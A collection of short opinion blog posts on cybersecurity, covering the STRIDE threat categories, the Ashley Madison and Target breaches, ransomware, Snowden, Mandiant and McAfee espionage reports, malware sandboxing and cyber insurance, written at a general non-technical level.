Cyber Attacks Typology

Saw this acronym to describe the types of cyber threats and thought it was useful.


STRIDE


Spoofing – Falsifying identity to gain systems access


Tampering – Making unauthorized changes to data or systems


Repudiation – Forging identify of actions to data or system to deny responsibility or even blame a 3rd party


Information Disclosure – Stealing (exfiltrating) information and disclosing it to unauthorized individuals


Denial of Service – Depriving legitimate users access to data or systems


Elevation of Privilege – Transforming user account to allow it to exceed legitimate user privileges (e.g. admin account or superuser)


Funny-sad enough, these six types of cyber attacks can cause any information security officer to lose their stride. 😉


(Source Photo: Andy Blumenthal 

Why Can’t We Keep Our Secrets

keepign-secrets-jpeg

Well after the now notorious email scandal and other information security mishaps galore, this advertisement in Washington, DC is really quite the rage. 

“Keeps classified data classified.”


As parents tell their children about keeping private things private:

“If you can’t keep it a secret, then how do you expect the other kids to keep it to themselves?”


There are lots of secrets in DC, but there are also a lot of big mouths, security negligence, and even corruption. 


This gives our adversaries the opportunities they need to get our countries vital information. 


We work too hard to develop the best intellectual property for national security and our economy as well as the critical policies for advancing human rights and democracy around the world to let it just be easy fodder for others to help themselves too. 


Technology won’t solve the gap in certain big mouths and sloppy Joes around town. 


Only vigilant, smart people can protect the nations vital information that is the fuel for our success and survival. 😉


(Source Photo: Andy Blumenthal)

Preventing Cyber Disaster

prevention

So I liked this ad from Palo Alto Networks on the side of the bus, over the windows:

“Dinosaurs react.
Professionals prevent.”

That’s some very good marketing for a cyber security company.


It’s almost a daily occurrence now to hear about the infiltrations into our networks and exfiltrations or manipulations of data that is taking place across government and industry.


Just today again, another NSA contractor accused of stealing highly classified computer code.


The day before Guccifer 2.0 and Wikileaks releases trove of stolen documents from the Clinton Foundation


And again, J&J reveals that it’s insulin pump is vulnerable to hacking following allegations in August that St. Jude heart devices were subject to life-threatening hacking. 


Certainly, we can’t afford to sit back and wait to react to the next attack…damage control and remediation is much harder than getting out in front of the problem in the first place. 


Prevention and deterrence is really the only solution…keep the hackers out and make sure they know that if they mess with us and our systems that we can identify who they are, find them, and take them out. 


These are the capabilities we need and must employ to dominate the cyber realm. 


In the presidential debates, candidates struggled to articulate how to deal with cybersecurity


But this is not a game of cyberopoly, rather national security, critical infrastructure, vital intellectual property, and our economy is at risk. 


Giving away Internet control and trying to plug leaks after the fact on a sinking cyber ship is no way to manage our vital technology resources.


It’s high time for the equivalent Cold War determination and investment that ensures we win a free and safe cyberspace with all our networks and data intact. 


This is the only way that we don’t go the way of the dinosaurs. 😉


(Source Photo: Andy Blumenthal)

My Ashley Madison

Lady
So Ashley Madison is now a well-known adulterous website, particularly after hackers stole 37 million records on the site participants, and have released that information to the public.


These tens of millions of users seek companionship for loveless or sexless marriages or perhaps are just plain liars and cheaters–who knows? 


But yikes, now everyone knows!


Huffington reports that divorce lawyers are anticipating a deluge of new clients seeking divorces


And BBC reports that two people have already taken their lives in Canada as a result of the release. 


What is incredible as well are the 15,000 people who used their .gov or .mil accounts presumably to hide their infidelity from their spouses, but now are in potentially huge trouble with their government agencies.


I assume that Ashley Madison prided themselves on their discretion in handling their clients accounts, but lo’ and behold the discretion is for naught compliments of some very naughty hackers. 


Privacy is becoming a very lonely and meaningless word whether you are faithful or a cheater–it’s all open fodder on the net. 😉


(Source Photo: Andy Blumenthal)

Data 4 Ransom

Data 4 Ransom

The future of cybercrime will soon become the almost routine taking of your personal and corporate data as hostage. 


Once the hacker has control of it, with or without exfiltration, they will attach malware to it–like a ticking time bomb.


A simple threat will follow:


“I have your data. Either you pay for your data back unharmed OR your data will become vaporware! You have one hour to decide. If you call the authorities, you data is history.”


So how valuable is your data to you?  


– Your personal information–financial, medical, legal, sentimental things, etc.


– Your corporate information–proprietary trade secrets, customer lists, employee data, more.


How long would it take you to reconstitute if it’s destroyed?  How about if instead it’s sold and used for identity theft or to copy your “secret sauce” (i.e. competitive advantage) or maybe even to surpass you in the marketplace? 


Data is not just inert…it is alive!


Data is not just valuable…often it’s invaluable!


Exposed in our networks or the cloud, data is at risk of theft, distortion, or even ultimate destruction. 


When the time comes, how much will you pay to save your data?


(Source Comic: Andy Blumenthal)

The *S*p*y* Named Snowden

The *S*p*y* Named Snowden

So was Edward Snowden a whistleblower (some even call him a patriot) or one of the most ruthless spies this country has ever known?

An editorial in the Wall Street Journal by Edward Jay Epstein makes a strong case that Snowden was a spy galore, and the whistleblowing was his cover.
What he stole? – 1.7 million documents from the NSA with “only a minute fraction of them have anything to do with civil liberties or whistleblowing.” Instead, the vast majority “were related to our military capabilities, operations, tactics, techniques, and procedures”–otherwise known as the “keys to the kingdom.” Moreover, it seems clear that a “top priority was lists of the computers of U.S. adversaries abroad that the NSA has succeeded in penetrating.”
When he stole them? – Snowden took the Booz Allen Hamilton job as a contractor for NSA in March 2013–this was at the “tail end of his operation.” Moreover, the Foreign Surveillance Intelligence Act (FISA) court order for Verizon to provide metadata on U.S. phone calls for 90 days had only been issued in April 2013. And Snowden told reporter James Rosen in October 2013, that his last job at NSA gave him access to every active operation against the Chinese and “that is why I accepted the position.”
Where did Snowden end up? – First in Hong Kong and then under the protection of the FSB (aka the old KGB) in Russia, which “effectively compromises all the sources and methods” and ties all too nicely with what he stole. A former cabinet official has indicated that the Snowden heist was either Russian espionage, Chinese espionage, or a joint operation.
If Snowden really was a spy as indicated, then the Whistleblowing of domestic surveillance in the U.S. was a most brilliant ploy by his operators to distract our nation from the true nature of the exfiltration and the harm done to our national security. In a way, it falls right in line with Russia’s creative storyline/coverup in taking Crimea in saying that they were only protecting ethnic Russians. Score 2 for Russia!

Are we so easily lied to and manipulated…is public opinion really just jello in the hands of the global spymasters.

We’ve got to be smart enough (i.e. critical thinkers) to interpret the noise in the intelligence signals, political speeches, and news stories to unveil the truth of what is really going on. In advertising, when exposing the truth of products and companies, this is sometimes referred to as culture jamming. Can we apply this to the complicated intrigue of global politics and get past the storyline that is fed to us to expose truth?

It’s high time to outmaneuver those that may seek to manipulate the public (whether from outside or even sometimes from within) with some brilliance of our own–in not believing every snippet that is fed to us and instead looking at the bigger picture of political theater, special interests, and national security to see who is now zinging whom and why. 😉

(Source Photo: Andy Blumenthal)

Safely Detonate That Malware

I like the potential of the FireEye Malware Protection System (MPS).

Unlike traditional signature-based malware protections like antivirus, firewalls, and intrusion prevention systems (IPS), FireEye is an additional security layer that uses a dynamic Multi-Vector Virtual Execution (MVX) engine to detonate even zero-day attacks from suspicious files, web pages, and email attachments.

According to Bloomberg Businessweek, Target’s implementation of FireEye detected the malware attack on Nov 30, 2013 and it alerted security officials, but allegedly “Target stood by as as 40 million credit card numbers–and 70 million addresses, phone numbers, and other pieces of personal information–gushed out of its mainframes”over two weeks!

In fact, FireEye could’ve been set to “automatically delete [the] malware as it’s detected” without human intervention, but “Target’s team apparently “turned that function off.”

FireEye works by “creating a parallel computer network on virtual machines,” and before data reaches its endpoint, they pass through FireEye’s technology. Here they are “fooled into thinking they’re in real computers,” and the files can be scanned, and attacks spotted in safe “detonation chambers.”

Target may have been way off target in the way they bungled their security breach, but using FireEye properly, it is good to know that attacks like this potentially can be thwarted in the future. 😉

[Note: this is not an endorsement of any product or vendor]

We’re Giving It All Away

Nice little video from Mandiant on “The anatomy of a cyber attack.”

Despite the typical firewalls, antivirus, and intrusion detection system, cyber attacks can and do penetrate your systems.

This happens through social engineering (including phishing attempts), automated spam, and zero-day exploits.

Once inside your network, the cyber attacker takes command and control of your computers, surveys your assets, steals user names and passwords, hijacks programs, and accesses valuable intellectual property.

Mandiant performs security incident response management (detecting breaches, containing it, and helping recovery efforts), and they are known for their report “APT1” (2013) exposing an alleged significant government-sponsored cyber espionage group that they state “has systematically stolen hundreds of terabytes of data from at least 141 organizations.”

Another fascinating report on a similar topic of advanced persistent threats was done by McAfee on Operation Shady Rat (2011) that reveals over 70 organizations (governments, commercial entities, and more) that were targeted over 5 years and had terabytes of information siphoned off.

The overall risk from cyber espionage is high and the McAfee report states:

– “Every company in every conceivable industry with significant size and valuable intellectual property and trade secrets has been compromised (or will be shortly), with the great majority of the victims rarely discovering the intrusion or its impact.”

– “What we have witnessed…has been nothing short of a historically unprecedented transfer of [intellectual] wealth – closely guarded national secrets…disappeared in the ever-growing electronic archived of dogged adversaries.”

In short we can’t keep a secret–we’re putting endless gobs and gobs of our information online and are not adequately protecting it in cyberspace, with the result that our adversaries are able to access, exfiltrate, disclose, modify, or destroy it.

In short, we’re giving it all away – why?

Insuring Against Cyber Attacks

Insuring Against Cyber Attacks

More and more, our technology is at risk of a cyber attack.

In fact, just today the Wall Street Journal reported that Iran has hacked into the Navy’s unclassified network.

While we can fix the computers that were attacked, the damage done in terms of data exfiltration and malware infiltration is another matter.

To fix the computers, we can wipe them, swap out the drives, or actually replace the whole system.

But the security breaches still often impose lasting damage, since you can’t get the lost data or privacy information back or as they say “put the genie back in the bottle.”

Also, you aren’t always aware of hidden malware that can lie dormant, like a trojan horse, nor can you immediately contain the damage of a spreading computer virus, such as a zero-day attack.

According to Federal Times, on top of more traditional IT security precautions (firewalls, antivirus, network scanning tools, security settings, etc.), many organizations are taking out cybersecurity insurance policies.

With insurance coverage, you transfer the risk of cybersecurity penetrations to cover the costs of compromised data and provide for things like “breach notification to victims, legal costs and forensics, and investigative costs to remedy the breach.”

Unfortunately, because there is little actuarial data for calculating risks, catastrophic events such as “cyber espionage and attacks against SCADA industrial controls systems are usually not covered.

DHS has a section on their website that promotes cybersecurity insurance where they state that the Department of Commerce views cybersecurity insurance as an “effective, market-driven way of increasing cybersecurity,” because it promotes preventive measures and best practices in order to lower insurance premiums and limits company losses from an attack.

Moreover, according to the DHS Cybersecurity Insurance Workshop Readout Report (November 2012) cybersecurity insurance or risk transfer is the fourth leg of a comprehensive risk management framework that starts with risk acceptance, risk mitigation, and risk avoidance.

I really like the idea of cybersecurity insurance to help protect organizations from the impact of cybersecurity attacks and for promoting sound cybersecurity practices to begin with.

With cyber attacks, like with other catastrophes (fire, flood, accident, illness, and so on), we will never be able to fully eliminate the risks, but we can prepare ourselves by taking out insurance to help cover the costs of reconstituting and recovery.

Buying insurance for cybersecurity is not capitulating our security, but rather adding one more layer of constructive defense. 😉

(Source Photo: Andy Blumenthal)